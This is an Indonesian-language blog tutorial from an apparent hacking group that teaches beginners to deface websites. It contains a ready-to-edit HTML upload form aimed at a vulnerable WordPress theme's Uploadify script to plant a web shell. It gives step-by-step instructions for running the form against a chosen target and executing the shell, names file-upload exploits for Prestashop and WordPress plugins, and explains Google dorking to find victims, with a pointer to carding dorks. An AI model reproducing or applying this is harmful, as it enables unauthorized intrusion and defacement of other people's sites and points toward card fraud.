Cara Belajar Deface Untuk Pemula
Cara Belajar Deface Untuk Pemula - Deface adalah hal yang dilakukan untuk masuk kesebuah sistem website didalamnya. Defacer adalah orang yang melakukan deface
Sistem website / cms itu ada berbagai macam halnya seperti Wordpress,Joomla, Prestashop dan cms lainnya. Untuk melakukan deface itu sulit sulit gampang, Gampangnya adalah kita mudah untuk memahami tehnik tehnik alur defacenya. kalo kita bacanya detail sambil dipreaktekin,
Nah susahnya juga inilah yang membuat defacer newbie menyerah, yaitu tentang dorking ( akan dijelaskan dibawah ) banyak sekali newbie yang menyerah dalam melakukan dorking ini walaupun dia sudah mengetahul dan memahami teknik alur defacenya tersebut .
Pengenalan CSRF & Remote Shell :
Dalam hal deface CSRF & Xampp paling mendominasi banyak hal dari tehnik, Oke langsung saja.
Cara Menggunakan CSRF ?
Lihat Disini : Deface Dengan CSRF (Cross Site Request Forgery)
Cara Menggunakan Remote Shell :
File 3xploit.php
(dibawah ini )
<form enctype="multipart/form-data" action="http://www.yeah.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php" method="post">Please choose a file: <input name="uploadfile" type="file" /><br /><input type="submit" value="upload" /></form>
1. Pertama Install Xampp nya, lalu kalo udah selesai, extrack file 3xploit.php,Shell.php dan letakkan di C:\xampp\php
2. Jangan lupa edit dulu 3xploit.php dengan Notepad, silahkan dirubah www.yeah.com menjadi target anda Lalu Save kembali..
3. Selanjutnya buka Xampp, lalu klik Start Apache, MySql, FileZilla
4. Setelah itu buka Terminal/CMD, lalu masuk ke directories C:\xampp\php>
Lalu ketik perintah php 3xploit.php dan tunggu aja hasilnya :)
5. Terus cari shellnya dah, berdasarkan shell pathnya :)
Nah, tinggal di eksekusi dah shellnya :)
Apa itu Exploit
Exploit adalah sebuah teknik yang menyerang keamanan_komputer / website secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer/web tujuan
Contoh Exploit :
Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
Wordpress Tevolution Plugin File Upload Vulnerability
Apa itu dork
Google dork adalah sebuah keyword yang digunakan untuk mencari target .
Type-type dork:
-intitle
-allintitle
(Mencari judul/title pada suatu web)
-inurl
-allinurl
(Mencari suatu string yang terdapat pada url)
-filetype
(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)
-intext
-allintext
(Mencari suatu nilai string dalam suatu web)
Contoh Dork ? +650 Dork Carding CC/Paypal [ Fresh ]
Metode Vulnerability
AddUser Arbitrary Bypass CSRF File Upload Multiple RemoteFile Unrestricted Uploadify dll
Cara Deface Random Pemula
1. Untuk bisa melakukan deface pertama tama kamu harus tau exploitnya dari berbagai cms diatas tadi.
2. Terus dorking targetnya
3 Selanjutnya lihat lah, metode apa yang digunakan dalam exploit tersebut Apakah menggunakan CSRF / Remote Shell/ dll
4. Eksekusi
Pertanyaan Seputar Deface :
Apakah deface juga memerlukan sebuah software / tools ?
Iya pasti deface memerlukan sebuah banyak tools karena kita tidak bisa melakukannya secara sendiri. lalu tools dasar apa saja yang harus ada ?
Untuk Pc :
Xampp
Untuk Android :
Webmaster lite
Palapa Webserver
Intinya adalah :
Deface itu gak mudah, banyak banget ilmu yang harus dipelajari. Gak semudah mulut lu bilang " Gue Hacker "
Pesan :
Itu adalah Cara Belajar deface Untuk pemula dari segi umumnya, untuk lebih detail dan jelasnya. Silahkan dicoba sendiri exploit exploit yang ada, Terimakasih semoga dapat membantu :)
Regards
3xploi7 Team
No comments:
Write comments